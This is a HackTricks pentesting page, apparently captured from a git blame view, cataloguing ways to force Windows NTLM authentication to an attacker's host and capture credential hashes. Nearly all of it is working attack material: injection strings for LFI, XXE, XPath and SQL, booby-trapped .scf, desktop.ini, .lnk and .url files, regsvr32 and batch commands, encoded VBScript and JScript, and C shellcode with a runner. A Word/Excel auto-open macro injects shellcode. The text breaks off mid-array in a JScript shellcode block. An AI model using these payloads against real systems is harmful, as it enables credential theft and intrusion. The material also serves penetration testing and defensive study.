2022-07-11 08:44:04 +00:00
# Places to steal NTLM creds
2022-04-28 16:01:33 +00:00
< details >
2023-04-07 08:52:01 +00:00
< summary > < a href = "https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology" > < strong > ☁️ HackTricks Cloud ☁️< / strong > < / a > < a href = "https://twitter.com/carlospolopm" > < strong > 🐦 Twitter 🐦< / strong > < / a > - < a href = "https://www.twitch.tv/hacktricks_live/schedule" > < strong > 🎙️ Twitch 🎙️< / strong > < / a > - < a href = "https://www.youtube.com/@hacktricks_LIVE" > < strong > 🎥 Youtube 🎥< / strong > < / a > < / summary >
2022-04-28 16:01:33 +00:00
2022-09-09 11:28:04 +00:00
- Do you work in a **cybersecurity company** ? Do you want to see your **company advertised in HackTricks** ? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF** ? Check the [**SUBSCRIPTION PLANS** ](https://github.com/sponsors/carlospolop )!
2022-04-28 16:01:33 +00:00
2022-09-09 11:28:04 +00:00
- Discover [**The PEASS Family** ](https://opensea.io/collection/the-peass-family ), our collection of exclusive [**NFTs** ](https://opensea.io/collection/the-peass-family )
2022-04-28 16:01:33 +00:00
2022-09-09 11:28:04 +00:00
- Get the [**official PEASS & HackTricks swag** ](https://peass.creator-spring.com )
2022-04-28 16:01:33 +00:00
2022-09-09 11:28:04 +00:00
- **Join the** [**💬** ](https://emojipedia.org/speech-balloon/ ) [**Discord group** ](https://discord.gg/hRep4RUj7f ) or the [**telegram group** ](https://t.me/peass ) or **follow** me on **Twitter** [**🐦** ](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md )[**@carlospolopm** ](https://twitter.com/carlospolopm )**.**
2022-04-28 16:01:33 +00:00
2022-12-05 22:29:21 +00:00
- **Share your hacking tricks by submitting PRs to the [hacktricks repo ](https://github.com/carlospolop/hacktricks ) and [hacktricks-cloud repo ](https://github.com/carlospolop/hacktricks-cloud )**.
2022-04-28 16:01:33 +00:00
< / details >
2022-07-11 08:44:04 +00:00
## Automatic Payloads Creation & Other lists
2022-04-28 16:01:33 +00:00
2022-07-11 08:44:04 +00:00
### [ntlm\_theft](https://github.com/Greenwolf/ntlm\_theft)
2020-12-23 00:17:28 +00:00
2021-01-05 18:31:09 +00:00
This tool will **create several documents/files** that if accessed by the user somehow they will **start a NTLM authentication with the attacker** .
2020-12-23 00:17:28 +00:00
2022-07-11 08:44:04 +00:00
#### ntlm\_theft supports the following attack types:
2021-01-07 12:13:26 +00:00
2021-01-06 11:08:49 +00:00
Browse to Folder Containing:
2021-01-07 12:13:26 +00:00
* .url – via URL field
* .url – via ICONFILE field
* .lnk - via icon\_location field
2022-07-11 08:44:04 +00:00
* .scf – via ICONFILE field (Not Working on Latest Windows)
* autorun.inf via OPEN field (Not Working on Latest Windows)
* desktop.ini - via IconResource field (Not Working on Latest Windows)
2021-01-06 11:08:49 +00:00
Open Document:
2021-01-07 12:13:26 +00:00
* .xml – via Microsoft Word external stylesheet
* .xml – via Microsoft Word includepicture field
2022-07-11 08:44:04 +00:00
* .htm – via Chrome & IE & Edge img src (only if opened locally, not hosted)
* .docx – via Microsoft Word includepicture field
2021-01-07 12:13:26 +00:00
2022-07-11 08:44:04 +00:00
\-.docx – via Microsoft Word external template
2021-01-07 12:13:26 +00:00
2022-07-11 08:44:04 +00:00
\-.docx – via Microsoft Word frameset webSettings
2021-01-07 12:13:26 +00:00
2022-07-11 08:44:04 +00:00
\-.xlsx - via Microsoft Excel external cell
2021-01-07 12:13:26 +00:00
2022-07-11 08:44:04 +00:00
\-.wax - via Windows Media Player playlist (Better, primary open)
2021-01-07 12:13:26 +00:00
2022-07-11 08:44:04 +00:00
\-.asx – via Windows Media Player playlist (Better, primary open)
2021-01-07 12:13:26 +00:00
2022-07-11 08:44:04 +00:00
\-.m3u – via Windows Media Player playlist (Worse, Win10 opens first in Groovy)
2021-01-07 12:13:26 +00:00
2022-07-11 08:44:04 +00:00
\-.jnlp – via Java external jar
2021-01-07 12:13:26 +00:00
2022-07-11 08:44:04 +00:00
\-.application – via any Browser (Must be served via a browser downloaded or won’ t run)
2021-01-06 11:08:49 +00:00
Open Document and Accept Popup:
2021-01-07 12:13:26 +00:00
* .pdf – via Adobe Acrobat Reader
2021-01-06 11:08:49 +00:00
Click Link in Chat Program:
2021-01-07 12:13:26 +00:00
* .txt – formatted link to paste into Zoom chat
2021-01-06 11:08:49 +00:00
2021-01-07 12:13:26 +00:00
> Example :
>
> ```bash
> # python3 ntlm_theft.py -g all -s 127.0.0.1 -f test
> Created: test/test.scf (BROWSE)
> Created: test/test-(url).url (BROWSE)
> Created: test/test-(icon).url (BROWSE)
> Created: test/test.rtf (OPEN)
> Created: test/test-(stylesheet).xml (OPEN)
> Created: test/test-(fulldocx).xml (OPEN)
> Created: test/test.htm (OPEN FROM DESKTOP WITH CHROME, IE OR EDGE)
> Created: test/test-(includepicture).docx (OPEN)
> Created: test/test-(remotetemplate).docx (OPEN)
> Created: test/test-(frameset).docx (OPEN)
> Created: test/test.m3u (OPEN IN WINDOWS MEDIA PLAYER ONLY)
> Created: test/test.asx (OPEN)
> Created: test/test.jnlp (OPEN)
> Created: test/test.application (DOWNLOAD AND OPEN)
> Created: test/test.pdf (OPEN AND ALLOW)
> Created: test/zoom-attack-instructions.txt (PASTE TO CHAT)
> Generation Complete.
> ```
2021-01-06 11:08:49 +00:00
2022-07-11 08:44:04 +00:00
### [All\_NTLM-Leak](https://github.com/Gl3bGl4z/All\_NTLM\_leak)
2020-12-23 00:17:28 +00:00
2021-01-06 11:14:58 +00:00
> Cheatsheet
2020-12-23 00:17:28 +00:00
This is a list of techniques to force NTLM authentications to steal credentials from the victim.
2022-07-11 08:44:04 +00:00
### Force NTLM Privileged Authentication
2020-12-23 00:17:28 +00:00
You may be able to **force a windows machine to authenticate to an arbitrary machine** using a privileged account. Read the following page to learn more:
2022-07-11 08:44:04 +00:00
{% content-ref url="../active-directory-methodology/printers-spooler-service-abuse.md" %}
[printers-spooler-service-abuse.md ](../active-directory-methodology/printers-spooler-service-abuse.md )
{% endcontent-ref %}
2020-07-15 15:43:14 +00:00
2022-07-11 08:44:04 +00:00
## LFI
2020-07-15 15:43:14 +00:00
2022-07-11 08:44:04 +00:00
The include() in PHP will resolve the network path for us.
2020-07-15 15:43:14 +00:00
2022-07-11 08:44:04 +00:00
```
2020-07-15 15:43:14 +00:00
http://host.tld/?page=//11.22.33.44/@OsandaMalith
```
2022-07-11 08:44:04 +00:00
![](< .. / . . / . gitbook / assets / image ( 642 ) . png > )
2020-07-15 15:43:14 +00:00
2022-07-11 08:44:04 +00:00
## XXE
2020-07-15 15:43:14 +00:00
In here I’ m using “php://filter/convert.base64-encode/resource=” that will resolve a network path.
```markup
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE root [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=//11.22.33.44/@OsandaMalith" >
]>
< root >
< name > < / name >
< tel > < / tel >
< email > OUT&xxe; OUT< / email >
< password > < / password >
< / root >
```
2022-07-11 08:44:04 +00:00
![](< .. / . . / . gitbook / assets / image ( 618 ) . png > )
2020-07-15 15:43:14 +00:00
2022-07-11 08:44:04 +00:00
## XPath Injection
2020-07-15 15:43:14 +00:00
2022-07-11 08:44:04 +00:00
Usually, doc() is used in out-of-band XPath injections, thus can be applied in resolving a network path.
2020-07-15 15:43:14 +00:00
2022-07-11 08:44:04 +00:00
```
2020-07-15 15:43:14 +00:00
http://host.tld/?title=Foundation& type=*& rent_days=* and doc('//35.164.153.224/@OsandaMalith')
```
2022-07-21 23:50:52 +00:00
![](< .. / . . / . gitbook / assets / image ( 638 ) ( 2 ) . png > )
2020-07-15 15:43:14 +00:00
2022-07-11 08:44:04 +00:00
## MySQL Injection
2020-07-15 15:43:14 +00:00
I have written a complete [post ](https://osandamalith.com/2017/02/03/mysql-out-of-band-hacking/ )on MySQL out-of-band injections which can be applied over the internet. You can also use ‘ INTO OUTFILE’ to resolve a network path.
2022-07-11 08:44:04 +00:00
```
2020-07-15 15:43:14 +00:00
http://host.tld/index.php?id=1’ union select 1,2,load_file(‘ \\\\192.168.0.100\\@OsandaMalith ’ ),4;%00
```
2022-07-11 08:44:04 +00:00
![](< .. / . . / . gitbook / assets / image ( 663 ) . png > )
2020-07-15 15:43:14 +00:00
2022-07-11 08:44:04 +00:00
## MSSQL
2020-07-15 15:43:14 +00:00
Since stacked queries are supported we can call stored procedures.
2022-07-11 08:44:04 +00:00
```
2020-07-15 15:43:14 +00:00
';declare @q varchar(99);set @q ='\\192.168.254.52\test'; exec master.dbo.xp_dirtree @q
```
2022-07-11 08:44:04 +00:00
## Regsvr32
2020-07-15 15:43:14 +00:00
Accidently found this one while experimenting with .sct files.
2022-07-11 08:44:04 +00:00
```
2020-07-15 15:43:14 +00:00
regsvr32 /s /u /i://35.164.153.224/@OsandaMalith scrobj.dll
```
2022-07-11 08:44:04 +00:00
## Batch
2020-07-15 15:43:14 +00:00
There are many possible ways you can explore
2022-07-11 08:44:04 +00:00
```
2020-07-15 15:43:14 +00:00
echo 1 > //192.168.0.1/abc
pushd \\192.168.0.1\abc
cmd /k \\192.168.0.1\abc
cmd /c \\192.168.0.1\abc
start \\192.168.0.1\abc
mkdir \\192.168.0.1\abc
type\\192.168.0.1\abc
dir\\192.168.0.1\abc
find, findstr, [x]copy, move, replace, del, rename and many more!
```
2022-07-11 08:44:04 +00:00
## Auto-Complete
2020-07-15 15:43:14 +00:00
2021-01-06 00:08:54 +00:00
You just need to type ‘ \host\’ the auto-complete will do the trick under the explorer and the run dialog box.
2020-12-11 22:27:11 +00:00
2022-07-11 08:44:04 +00:00
![](< .. / . . / . gitbook / assets / image ( 660 ) . png > )
2020-12-11 22:27:11 +00:00
2022-07-11 08:44:04 +00:00
![](< .. / . . / . gitbook / assets / image ( 637 ) . png > )
2020-07-15 15:43:14 +00:00
2022-07-11 08:44:04 +00:00
## Autorun.inf
2020-07-15 15:43:14 +00:00
Starting from Windows 7 this feature is disabled. However you can enable by changing the group policy for Autorun. Make sure to hide the Autorun.inf file to work.
2022-07-11 08:44:04 +00:00
```
2020-07-15 15:43:14 +00:00
[autorun]
open=\\35.164.153.224\setup.exe
icon=something.ico
action=open Setup.exe
```
2022-07-11 08:44:04 +00:00
## Shell Command Files
2020-07-15 15:43:14 +00:00
2022-07-11 08:44:04 +00:00
It is possible to obtain passwords hashes of domain users or shells when writing permissions given to unauthenticated users. SCF (Shell Command Files) can perform a limited set of operations like showing the Windows desktop or opening a Windows Explorer. Save the code below as `ordinary.scf` and put it into a network share.
2020-07-15 15:43:14 +00:00
2022-07-11 08:44:04 +00:00
```
2020-07-15 15:43:14 +00:00
[Shell]
Command=2
2021-10-07 08:09:05 +00:00
IconFile=\\AttackerIP\ordinary.ico
2020-07-15 15:43:14 +00:00
[Taskbar]
Command=ToggleDesktop
```
2022-07-11 08:44:04 +00:00
## Desktop.ini
2020-07-15 15:43:14 +00:00
The desktop.ini files contain the information of the icons you have applied to the folder. We can abuse this to resolve a network path. Once you open the folder you should get the hashes.
2022-07-11 08:44:04 +00:00
```
2020-07-15 15:43:14 +00:00
mkdir openMe
attrib +s openMe
cd openMe
echo [.ShellClassInfo] > desktop.ini
echo IconResource=\\192.168.0.1\aa >> desktop.ini
attrib +s +h desktop.ini
```
In Windows XP systems the desktop.ini file uses ‘ IcondFile’ instead of ‘ IconResource’ .
2022-07-11 08:44:04 +00:00
```
2020-07-15 15:43:14 +00:00
[.ShellClassInfo]
IconFile=\\192.168.0.1\aa
IconIndex=1337
```
2022-07-11 08:44:04 +00:00
## Shortcut Files (.lnk)
2020-07-15 15:43:14 +00:00
We can create a shortcut containing our network path and as you as you open the shortcut Windows will try to resolve the network path. You can also specify a keyboard shortcut to trigger the shortcut. For the icon you can give the name of a Windows binary or choose an icon from either shell32.dll, Ieframe.dll, imageres.dll, pnidui.dll or wmploc.dll located in the system32 directory.
2022-08-15 13:00:19 +00:00
```powershell
2020-07-15 15:43:14 +00:00
Set shl = CreateObject("WScript.Shell")
Set fso = CreateObject("Scripting.FileSystemObject")
currentFolder = shl.CurrentDirectory
2021-01-06 00:08:54 +00:00
2020-07-15 15:43:14 +00:00
Set sc = shl.CreateShortcut(fso.BuildPath(currentFolder, "\StealMyHashes.lnk"))
2021-01-06 00:08:54 +00:00
2020-07-15 15:43:14 +00:00
sc.TargetPath = "\\35.164.153.224\@OsandaMalith"
sc.WindowStyle = 1
sc.HotKey = "Ctrl+Alt+O"
sc.IconLocation = "%windir%\system32\shell32.dll, 3"
sc.Description = "I will Steal your Hashes"
sc.Save
```
The Powershell version.
2022-08-15 13:00:19 +00:00
```powershell
2022-09-03 09:30:58 +00:00
#TargetPath attack
2020-07-15 15:43:14 +00:00
$objShell = New-Object -ComObject WScript.Shell
$lnk = $objShell.CreateShortcut("StealMyHashes.lnk")
$lnk.TargetPath = "\\35.164.153.224\@OsandaMalith"
$lnk.WindowStyle = 1
$lnk.IconLocation = "%windir%\system32\shell32.dll, 3"
$lnk.Description = "I will Steal your Hashes"
$lnk.HotKey = "Ctrl+Alt+O"
$lnk.Save()
2022-09-03 09:30:58 +00:00
#IconLocation Attack
$wsh = new-object -ComObject wscript.shell
$shortcut = $wsh.CreateShortcut("\\dc\software\test.lnk")
$shortcut.IconLocation = "\\10.10.10.10\test.ico"
$shortcut.Save()
2020-07-15 15:43:14 +00:00
```
2022-07-11 08:44:04 +00:00
## Internet Shortcuts (.url)
2020-07-15 15:43:14 +00:00
Another shortcut in Windows is the Internet shortcuts. You can save this as something.url
2022-08-15 13:00:19 +00:00
```bash
2020-07-15 15:43:14 +00:00
echo [InternetShortcut] > stealMyHashes.url
echo URL=file://192.168.0.1/@OsandaMalith >> stealMyHashes.url
```
2022-07-11 08:44:04 +00:00
## Autorun with Registry
2020-07-15 15:43:14 +00:00
You can add a new registry key in any of the following paths.
2022-07-11 08:44:04 +00:00
```
2020-07-15 15:43:14 +00:00
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
```
2022-07-21 20:01:55 +00:00
![](< .. / . . / . gitbook / assets / image ( 307 ) ( 5 ) . png > )
2020-07-15 15:43:14 +00:00
2022-07-11 08:44:04 +00:00
## Powershell
2020-07-15 15:43:14 +00:00
There are probably many scriptlets in Powershell that would resolve a network path.
2022-07-11 08:44:04 +00:00
```
2020-07-15 15:43:14 +00:00
Invoke-Item \\192.168.0.1\aa
Get-Content \\192.168.0.1\aa
Start-Process \\192.168.0.1\aa
```
2022-07-11 08:44:04 +00:00
## IE
2020-07-15 15:43:14 +00:00
IE will resolve UNC paths. For example
2022-08-15 13:00:19 +00:00
```html
2021-01-06 00:08:54 +00:00
< img src = " \\\\192.168.0.1 \\aa" >
2020-07-15 15:43:14 +00:00
```
You can inject under XSS or in scenarios you find SQL injection. For example.
2022-07-11 08:44:04 +00:00
```
2021-01-06 00:08:54 +00:00
http://host.tld/?id=-1' union select 1,'< img src = " \\\\192.168.0.1 \\aa" > ';%00
2020-07-15 15:43:14 +00:00
```
2022-07-11 08:44:04 +00:00
## VBScript
2020-07-15 15:43:14 +00:00
You can save this as .vbs or can be used inside a macro that is applied to Word or Excel files.
2020-12-23 00:17:28 +00:00
```bash
2020-07-15 15:43:14 +00:00
Set fso = CreateObject("Scripting.FileSystemObject")
Set file = fso.OpenTextFile("//192.168.0.100/aa", 1)
```
You can apply in web pages but this works only with IE.
2020-12-23 00:17:28 +00:00
```markup
2020-07-15 15:43:14 +00:00
< html >
< script type = "text/Vbscript" >
<!--
Set fso = CreateObject("Scripting.FileSystemObject")
Set file = fso.OpenTextFile("//192.168.0.100/aa", 1)
//-->
< / script >
< / html >
```
Here’ the encoded version. You can encode and save this as something.vbe
2022-07-11 08:44:04 +00:00
```
2020-07-15 15:43:14 +00:00
#@~^ZQAAAA==j Y~6?}'ZM2mO2}4%+1YcEUmDb2YbxocorV ?H/O+h6(LnmDE#=?nO,sksn{0dWcGa+U:+XYsbV cJJzf*cF *cF*2 yczmCE~8#XSAAAA==^#~@
```
You can apply this in html files too. But only works with IE. You can save this as something.hta which will be an HTML Application under windows, which mshta.exe will execute it. By default it uses IE.
2022-07-11 08:44:04 +00:00
```
2020-07-15 15:43:14 +00:00
< html >
< script type = "text/Vbscript.Encode" >
<!--
#@~^ZQAAAA==j Y~6?}'ZM2mO2}4%+1YcEUmDb2YbxocorV ?H/O+h6(LnmDE#=?nO,sksn{0dWcGa+U:+XYsbV cJJzf*cF *cF*2 yczmCE~8#XSAAAA==^#~@
//-->
< / script >
< / html >
```
2022-07-11 08:44:04 +00:00
## JScript
2020-07-15 15:43:14 +00:00
You can save this as something.js under windows.
2020-12-23 00:17:28 +00:00
```javascript
2020-07-15 15:43:14 +00:00
var fso = new ActiveXObject("Scripting.FileSystemObject")
fso.FileExists("//192.168.0.103/aa")
```
You can apply the same in html files but only works with IE. Also you can save this as something.hta.
2020-12-23 00:17:28 +00:00
```markup
2020-07-15 15:43:14 +00:00
< html >
< script type = "text/Jscript" >
<!--
var fso = new ActiveXObject("Scripting.FileSystemObject")
fso.FileExists("//192.168.0.103/aa")
//-->
< / script >
< / html >
```
Here’ s the encoded version. You can save this as something.jse.
2022-07-11 08:44:04 +00:00
```
2020-07-15 15:43:14 +00:00
#@~^XAAAAA==-mD~6/K'x h,)mDk-+or8% mYvE?1DkaOrxTRwks+jzkYn:}8L mOE*i0dGcsrV 3XkdD/vJzJFO+R8v0RZRqT2zlmE#Ux4AAA==^#~@
```
The html version of this.
2020-12-23 00:17:28 +00:00
```markup
2020-07-15 15:43:14 +00:00
< html >
< script type = "text/Jscript.Encode" >
<!--
#@~^XAAAAA==-mD~6/K'x h,)mDk-+or8% mYvE?1DkaOrxTRwks+jzkYn:}8L mOE*i0dGcsrV 3XkdD/vJzJFO+R8v0RZRqT2zlmE#Ux4AAA==^#~@
//-->
< / script >
< / html >
```
2022-07-11 08:44:04 +00:00
## Windows Script Files
2020-07-15 15:43:14 +00:00
Save this as something.wsf.
2020-12-23 00:17:28 +00:00
```markup
2020-07-15 15:43:14 +00:00
< package >
< job id = "boom" >
< script language = "VBScript" >
Set fso = CreateObject("Scripting.FileSystemObject")
Set file = fso.OpenTextFile("//192.168.0.100/aa", 1)
< / script >
< / job >
< / package >
```
2022-07-11 08:44:04 +00:00
## Shellcode
2020-07-15 15:43:14 +00:00
Here’ s a small shellcode I made. This shellcode uses CreateFile and tries to read a non-existing network path. You can use tools such as Responder to capture NetNTLM hashes. The shellcode can be modified to steal hashes over the internet. SMBRelay attacks can also be performed.
2022-07-11 08:44:04 +00:00
```cpp
2020-07-15 15:43:14 +00:00
/*
Title: CreateFile Shellcode
Author: Osanda Malith Jayathissa (@OsandaMalith)
Website: https://osandamalith.com
Size: 368 Bytes
*/
# include <stdlib.h>
# include <stdio.h>
# include <string.h>
# include <windows.h>
2021-01-06 00:08:54 +00:00
2020-07-15 15:43:14 +00:00
int main() {
2021-01-06 00:08:54 +00:00
2020-07-15 15:43:14 +00:00
char *shellcode =
"\xe8\xff\xff\xff\xff\xc0\x5f\xb9\x4c\x03\x02\x02\x81\xf1\x02\x02"
"\x02\x02\x83\xc7\x1d\x33\xf6\xfc\x8a\x07\x3c\x05\x0f\x44\xc6\xaa"
"\xe2\xf6\xe8\x05\x05\x05\x05\x5e\x8b\xfe\x81\xc6\x29\x01\x05\x05"
"\xb9\x02\x05\x05\x05\xfc\xad\x01\x3c\x07\xe2\xfa\x56\xb9\x8d\x10"
"\xb7\xf8\xe8\x5f\x05\x05\x05\x68\x31\x01\x05\x05\xff\xd0\xb9\xe0"
"\x53\x31\x4b\xe8\x4e\x05\x05\x05\xb9\xac\xd5\xaa\x88\x8b\xf0\xe8"
"\x42\x05\x05\x05\x6a\x05\x68\x80\x05\x05\x05\x6a\x03\x6a\x05\x6a"
"\x01\x68\x05\x05\x05\x80\x68\x3e\x01\x05\x05\xff\xd0\x6a\x05\xff"
"\xd6\x33\xc0\x5e\xc3\x33\xd2\xeb\x10\xc1\xca\x0d\x3c\x61\x0f\xbe"
"\xc0\x7c\x03\x83\xe8\x20\x03\xd0\x41\x8a\x01\x84\xc0\x75\xea\x8b"
"\xc2\xc3\x8d\x41\xf8\xc3\x55\x8b\xec\x83\xec\x14\x53\x56\x57\x89"
"\x4d\xf4\x64\xa1\x30\x05\x05\x05\x89\x45\xfc\x8b\x45\xfc\x8b\x40"
"\x0c\x8b\x40\x14\x89\x45\xec\x8b\xf8\x8b\xcf\xe8\xd2\xff\xff\xff"
"\x8b\x70\x18\x8b\x3f\x85\xf6\x74\x4f\x8b\x46\x3c\x8b\x5c\x30\x78"
"\x85\xdb\x74\x44\x8b\x4c\x33\x0c\x03\xce\xe8\x96\xff\xff\xff\x8b"
"\x4c\x33\x20\x89\x45\xf8\x33\xc0\x03\xce\x89\x4d\xf0\x89\x45\xfc"
"\x39\x44\x33\x18\x76\x22\x8b\x0c\x81\x03\xce\xe8\x75\xff\xff\xff"
"\x03\x45\xf8\x39\x45\xf4\x74\x1c\x8b\x45\xfc\x8b\x4d\xf0\x40\x89"
"\x45\xfc\x3b\x44\x33\x18\x72\xde\x3b\x7d\xec\x75\x9c\x33\xc0\x5f"
"\x5e\x5b\xc9\xc3\x8b\x4d\xfc\x8b\x44\x33\x24\x8d\x04\x48\x0f\xb7"
"\x0c\x30\x8b\x44\x33\x1c\x8d\x04\x88\x8b\x04\x30\x03\xc6\xeb\xdf"
"\x21\x05\x05\x05\x50\x05\x05\x05\x6b\x65\x72\x6e\x65\x6c\x33\x32"
"\x2e\x64\x6c\x6c\x05\x2f\x2f\x65\x72\x72\x6f\x72\x2f\x61\x61\x05";
2021-01-06 00:08:54 +00:00
2020-07-15 15:43:14 +00:00
DWORD oldProtect;
2021-01-06 00:08:54 +00:00
2020-07-15 15:43:14 +00:00
wprintf(L"Length : %d bytes\n@OsandaMalith ", strlen(shellcode));
BOOL ret = VirtualProtect (shellcode, strlen(shellcode), PAGE_EXECUTE_READWRITE, &oldProtect);
2021-01-06 00:08:54 +00:00
2020-07-15 15:43:14 +00:00
if (!ret) {
fprintf(stderr, "%s", "Error Occured");
return EXIT_FAILURE;
}
2021-01-06 00:08:54 +00:00
2020-07-15 15:43:14 +00:00
((void(*)(void))shellcode)();
2021-01-06 00:08:54 +00:00
2020-07-15 15:43:14 +00:00
VirtualProtect (shellcode, strlen(shellcode), oldProtect, &oldProtect);
2021-01-06 00:08:54 +00:00
2020-07-15 15:43:14 +00:00
return EXIT_SUCCESS;
}
```
[https://packetstormsecurity.com/files/141707/CreateFile-Shellcode.html ](https://packetstormsecurity.com/files/141707/CreateFile-Shellcode.html )
2022-07-11 08:44:04 +00:00
## Shellcode Inside Macros
2020-07-15 15:43:14 +00:00
Here’ s the above shellcode applied inside a Word/Excel macro. You can use the same code inside a VB6 application.
2022-07-11 08:44:04 +00:00
```basic
2020-07-15 15:43:14 +00:00
' Author : Osanda Malith Jayathissa (@OsandaMalith)
' Title: Shellcode to request a non-existing network path
' Website: https://osandamalith
' Shellcode : https://packetstormsecurity.com/files/141707/CreateFile-Shellcode.html
' This is a word/excel macro. This can be used in vb6 applications as well
2021-01-06 00:08:54 +00:00
2020-07-15 15:43:14 +00:00
#If Vba7 Then
Private Declare PtrSafe Function CreateThread Lib "kernel32" ( _
ByVal lpThreadAttributes As Long, _
ByVal dwStackSize As Long, _
ByVal lpStartAddress As LongPtr, _
lpParameter As Long, _
ByVal dwCreationFlags As Long, _
lpThreadId As Long) As LongPtr
2021-01-06 00:08:54 +00:00
2020-07-15 15:43:14 +00:00
Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" ( _
ByVal lpAddress As Long, _
ByVal dwSize As Long, _
ByVal flAllocationType As Long, _
ByVal flProtect As Long) As LongPtr
2021-01-06 00:08:54 +00:00
2020-07-15 15:43:14 +00:00
Private Declare PtrSafe Function RtlMoveMemory Lib "kernel32" ( _
ByVal Destination As LongPtr, _
ByRef Source As Any, _
ByVal Length As Long) As LongPtr
2021-01-06 00:08:54 +00:00
2020-07-15 15:43:14 +00:00
#Else
Private Declare Function CreateThread Lib "kernel32" ( _
ByVal lpThreadAttributes As Long, _
ByVal dwStackSize As Long, _
ByVal lpStartAddress As Long, _
lpParameter As Long, _
ByVal dwCreationFlags As Long, _
lpThreadId As Long) As Long
2021-01-06 00:08:54 +00:00
2020-07-15 15:43:14 +00:00
Private Declare Function VirtualAlloc Lib "kernel32" ( _
ByVal lpAddress As Long, _
ByVal dwSize As Long, _
ByVal flAllocationType As Long, _
ByVal flProtect As Long) As Long
2021-01-06 00:08:54 +00:00
2020-07-15 15:43:14 +00:00
Private Declare Function RtlMoveMemory Lib "kernel32" ( _
ByVal Destination As Long, _
ByRef Source As Any, _
ByVal Length As Long) As Long
#EndIf
2021-01-06 00:08:54 +00:00
2020-07-15 15:43:14 +00:00
Const MEM_COMMIT = & H1000
Const PAGE_EXECUTE_READWRITE = & H40
2021-01-06 00:08:54 +00:00
2020-07-15 15:43:14 +00:00
Sub Auto_Open()
Dim source As Long, i As Long
#If Vba7 Then
Dim lpMemory As LongPtr, lResult As LongPtr
#Else
Dim lpMemory As Long, lResult As Long
#EndIf
2021-01-06 00:08:54 +00:00
2020-07-15 15:43:14 +00:00
Dim bShellcode(376) As Byte
bShellcode(0) = 232
bShellcode(1) = 255
bShellcode(2) = 255
bShellcode(3) = 255
bShellcode(4) = 255
bShellcode(5) = 192
bShellcode(6) = 95
bShellcode(7) = 185
bShellcode(8) = 85
bShellcode(9) = 3
bShellcode(10) = 2
bShellcode(11) = 2
bShellcode(12) = 129
bShellcode(13) = 241
bShellcode(14) = 2
bShellcode(15) = 2
bShellcode(16) = 2
.....................
lpMemory = VirtualAlloc(0, UBound(bShellcode), MEM_COMMIT, PAGE_EXECUTE_READWRITE)
For i = LBound(bShellcode) To UBound(bShellcode)
source = bShellcode(i)
lResult = RtlMoveMemory(lpMemory + i, source, 1)
Next i
lResult = CreateThread(0, 0, lpMemory, 0, 0, 0)
End Sub
Sub AutoOpen()
Auto_Open
End Sub
Sub Workbook_Open()
Auto_Open
End Sub
```
[https://github.com/OsandaMalith/Shellcodes/blob/master/CreateFile/CreateFile.vba ](https://github.com/OsandaMalith/Shellcodes/blob/master/CreateFile/CreateFile.vba )
2022-07-11 08:44:04 +00:00
## Shellcode Inside VBS and JS
2020-07-15 15:43:14 +00:00
2022-07-11 08:44:04 +00:00
subTee has done many kinds of research with JS and DynamicWrapperX. You can find a POC using the DynamicWrapperX DLL.\
[http://subt0x10.blogspot.com/2016/09/shellcode-via-jscript-vbscript.html ](http://subt0x10.blogspot.com/2016/09/shellcode-via-jscript-vbscript.html )\
Based on that I have ported the shellcode to JS and VBS. The fun part is we can embed shellcode in JScript or VBScript inside html and .hta formats.\
2020-07-15 15:43:14 +00:00
Note the following shellcode directs to my IP.
2022-07-11 08:44:04 +00:00
#### JScript
2020-07-15 15:43:14 +00:00
2022-07-11 08:44:04 +00:00
```javascript
2020-07-15 15:43:14 +00:00
/*
* Author : Osanda Malith Jayathissa (@OsandaMalith)
* Title: Shellcode to request a non-existing network path
* Website: https://osandamalith.com
* Shellcode : https://packetstormsecurity.com/files/141707/CreateFile-Shellcode.html
* Based on subTee's JS: https://gist.github.com/subTee/1a6c96df38b9506506f1de72573ceb04
*/
DX = new ActiveXObject("DynamicWrapperX");
DX.Register("kernel32.dll", "VirtualAlloc", "i=luuu", "r=u");
DX.Register("kernel32.dll","CreateThread","i=uullu","r=u" );
DX.Register("kernel32.dll", "WaitForSingleObject", "i=uu", "r=u");
2021-01-06 00:08:54 +00:00
2020-07-15 15:43:14 +00:00
var MEM_COMMIT = 0x1000;
var PAGE_EXECUTE_READWRITE = 0x40;
2021-01-06 00:08:54 +00:00
2020-07-15 15:43:14 +00:00
var sc = [
0xe8, 0xff, 0xff, 0xff, 0xff, 0xc0, 0x5f, 0xb9, 0x55, 0x03, 0x02, 0x02, 0x81, 0xf1, 0x02, 0x02, 0x02, 0x02, 0x83, 0xc7,
0x1d, 0x33, 0xf6, 0xfc, 0x8a, 0x07, 0x3c, 0x05, 0x0f, 0x44, 0xc6, 0xaa, 0xe2, 0xf6, 0xe8, 0x05, 0x05, 0x05, 0x05, 0x5e,
0x8b, 0xfe, 0x81, 0xc6, 0x29, 0x01, 0x05, 0x05, 0xb9, 0x02, 0x05, 0x05, 0x05, 0xfc, 0xad, 0x01, 0x3c, 0x07, 0xe2, 0xfa,
0x56, 0xb9, 0x8d, 0x10, 0xb7, 0xf8, 0xe8, 0x5f, 0x05, 0x05, 0x05, 0x68, 0x31, 0x01, 0x05, 0x05, 0xff, 0xd0, 0xb9, 0xe0,
0x53, 0x31, 0x4b, 0xe8, 0x4e, 0x05, 0x05, 0x05, 0xb9, 0xac, 0xd5, 0xaa, 0x88, 0x8b, 0xf0, 0xe8, 0x42, 0x05, 0x05, 0x05,
0x6a, 0x05, 0x68, 0x80, 0x05, 0x05, 0x05, 0x6a, 0x03, 0x6a, 0x05, 0x6a, 0x01, 0x68, 0x05, 0x05, 0x05, 0x80, 0x68, 0x3e,
0x01, 0x05, 0x05, 0xff, 0xd0, 0x6a, 0x05, 0xff, 0xd6, 0x33, 0xc0, 0x5e, 0xc3, 0x33, 0xd2, 0xeb, 0x10, 0xc1, 0xca, 0x0d,
